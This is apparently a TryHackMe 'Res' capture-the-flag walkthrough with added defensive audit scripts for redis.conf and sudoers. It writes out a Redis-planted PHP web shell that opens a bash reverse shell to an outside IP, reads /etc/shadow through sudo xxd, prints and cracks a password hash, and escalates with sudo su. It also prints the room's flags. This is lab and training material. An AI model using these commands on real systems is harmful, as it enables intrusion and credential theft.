TryHackMe — Res Room Simple Writeup By Karthikeyan Nagaraj
2023-5-11 12:11:21 Author: infosecwriteups.com

1. Scan the machine, how many ports are open?

Ans: 2

2. What is the database management system installed on the server?

Ans: redis

3. What port is the database management system running on?

Ans: 6379

4. What is the version of the database management system installed on the server?

Ans: 6.0.7

5. Compromise the machine and locate user.txt

Let's connect with redis-cli using the following syntax:

redis-cli -h <Machine-IP>

We found a username, vianka, so let's enumerate further.

1. Let's try to upload a reverse shell using the following commands inside redis-cli (the dump directory and filename are pointed at the web root, so the saved RDB file is served as PHP):

config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save

2. Now, let's start a netcat listener using the following command:

nc -lvp 4444

3. Then navigate to http://<Machine-IP>/shell.php

Ans: thm{red1s_rce_w1thout_credent1als} 
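From the defender's side, the foothold above works only because the Redis instance is reachable from the network without a password and still exposes CONFIG, which lets any client redirect the RDB dump into a web root. The following is an added example, not code from the writeup or from Redis, that audits a redis.conf text for exactly those settings; the two sample configs are constructed, the web-root prefixes are an assumption, and the check mirrors Redis 6 defaults (protected mode only shields an instance that has no explicit bind and no password).

```python
"""Audit a redis.conf text for the settings that made the Res box exploitable.

Added example (not from the writeup). Works on a config string, so it runs
offline; the WEAK/HARDENED samples below are constructed for illustration.
"""

# Directories a web server commonly serves from (assumption; extend as needed).
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")

# Redis 6 compiled-in defaults used when a directive is absent.
DEFAULTS = {"bind": "*", "protected-mode": "yes", "requirepass": "", "dir": "./"}


def parse_redis_conf(text):
    """Return {directive: [values...]}; Redis treats only whole-line '#' as comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)  # later lines override earlier ones
    return conf


def _last(conf, key):
    return conf.get(key, [DEFAULTS.get(key, "")])[-1].strip('"')


def _renamed_commands(conf):
    return {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}


def unauthenticated_config_reachable(conf):
    """True when a remote client with no credentials can issue CONFIG SET."""
    bind_absent = "bind" not in conf
    listens_all = bind_absent or any(
        tok in ("*", "0.0.0.0", "::", "-::*") for tok in _last(conf, "bind").split())
    protected = _last(conf, "protected-mode").lower() != "no"
    has_password = bool(_last(conf, "requirepass"))
    # Protected mode refuses non-loopback clients only if there is no explicit
    # bind line and no password; an explicit 'bind 0.0.0.0' switches it off.
    shielded = protected and bind_absent and not has_password
    return (listens_all and not shielded and not has_password
            and "CONFIG" not in _renamed_commands(conf))


def audit_redis_conf(text):
    """Return human-readable findings for each weak setting in the config."""
    conf = parse_redis_conf(text)
    findings = []
    if any(tok in ("*", "0.0.0.0", "::", "-::*") for tok in _last(conf, "bind").split()):
        findings.append("bind: listens on all interfaces")
    if _last(conf, "protected-mode").lower() == "no":
        findings.append("protected-mode: disabled")
    if not _last(conf, "requirepass"):
        findings.append("requirepass: no password set")
    if "CONFIG" not in _renamed_commands(conf):
        findings.append("rename-command: CONFIG still reachable by clients")
    dump_dir = _last(conf, "dir")
    if any(dump_dir.startswith(root) for root in WEB_ROOTS):
        findings.append(f"dir: dump directory {dump_dir} is under a web root")
    return findings


# Constructed sample resembling the state exploited in the writeup.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
"""

# Constructed hardened counterpart: loopback only, password, CONFIG disabled.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "CHANGE-ME-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        conf = parse_redis_conf(text)
        print(f"[{name}] unauthenticated CONFIG reachable:",
              unauthenticated_config_reachable(conf))
        for finding in audit_redis_conf(text):
            print("  -", finding)
```

Disabling CONFIG with rename-command does not remove the need for a password and a loopback bind; each check above stands on its own, and the "reachable" verdict is only clear when all three are in place.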

6. What is the local user account password?

Checking GTFOBins, we found a binary (xxd) that can read files when run with sudo permissions.

1. So let's first make our shell interactive with the python command.
2. Then we try to read the /etc/shadow file using the following commands:

$ python3 -c "import pty; pty.spawn('/bin/bash')"

$ LFILE=/etc/shadow

$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r

root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::

vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

3. Now copy the hash of vianka into a file named hash.txt on your system. (Make sure the hash was copied intact if you paste it via the terminal.)

4. Now let's use john to crack the password using the command below:

$ john hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst

beautiful1 (vianka)

Session completed.

Ans: beautiful1

7. Escalate privileges and obtain root.txt

1. Now let's log in as vianka with her password beautiful1 using the command su vianka, and check which commands vianka can run with sudo.

2. She can run all commands with sudo, so let's switch to root:

sudo su
cat /root/root.txt

Ans: thm{xxd_pr1v_escalat1on}
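Both privilege steps on this box come from sudo rules: xxd runnable as root reads /etc/shadow (question 6), and an unrestricted ALL rule turns a cracked password into sudo su (question 7). The following is an added example, not code from the writeup, that parses plain sudoers syntax and flags both kinds of rule so an administrator can catch them before a penetration test does. The sample ruleset is constructed; the file-read binary list holds only xxd, the one binary the writeup uses, and a real audit would extend it from GTFOBins.

```python
"""Flag sudoers rules that grant a low-privilege user a root file read or a
full root shell, the two weaknesses used on this box.

Added example (not from the writeup). Parses sudoers text from a string so it
runs offline; SAMPLE_SUDOERS below is constructed. Aliases and line
continuations are not handled.
"""
import os
import re

# Binaries that can read arbitrary files when run as root via sudo.
# Only xxd is listed because it is the binary used in this writeup (assumption:
# extend from GTFOBins for a real audit).
FILE_READ_BINARIES = {"xxd"}

# user hosts=(runas) command-spec
_RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
_TAG_RE = re.compile(r"^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*)+")


def parse_sudoers(text):
    """Return one dict per command entry; Defaults and comment lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        user, hosts, runas, spec = m.groups()
        nopasswd = False  # a tag applies to every command that follows it
        for entry in spec.split(","):
            entry = entry.strip()
            if "NOPASSWD:" in entry:
                nopasswd = True
            elif "PASSWD:" in entry:
                nopasswd = False
            command = _TAG_RE.sub("", entry).strip()
            if not command:
                continue
            rules.append({"user": user, "hosts": hosts, "runas": runas or "root",
                          "command": command, "nopasswd": nopasswd})
    return rules


def risky_sudo_rules(text):
    """Return rules that give a full root shell or a root-level file read."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue  # root already has everything
        binary = os.path.basename(rule["command"].split()[0])
        if rule["command"] == "ALL":
            reason = "unrestricted sudo: any command as root, e.g. sudo su"
        elif binary in FILE_READ_BINARIES:
            reason = f"{binary} can read any file as root, e.g. /etc/shadow"
        else:
            continue
        findings.append({**rule, "reason": reason})
    return findings


# Constructed sample /etc/sudoers mixing safe and risky entries.
SAMPLE_SUDOERS = """
# constructed sample
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/xxd
vianka ALL=(ALL:ALL) ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup ALL=(ALL) /usr/bin/apt update, NOPASSWD: /usr/bin/xxd
"""

if __name__ == "__main__":
    for r in risky_sudo_rules(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if r["nopasswd"] else "password"
        print(f"{r['user']:<10} {r['command']:<30} [{tag}] {r['reason']}")
```

The deploy rule is left alone because it pins systemctl to one argument; the fix for the flagged rules is the same one a defender would apply on the Res box: drop the blanket ALL for ordinary users and never grant a file-read-capable binary as root without arguments.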

Source: https://infosecwriteups.com/tryhackme-res-room-simple-writeup-by-karthikeyan-nagaraj-8320a012b7c7?source=rss----7b722bfd1b8d--bug_bounty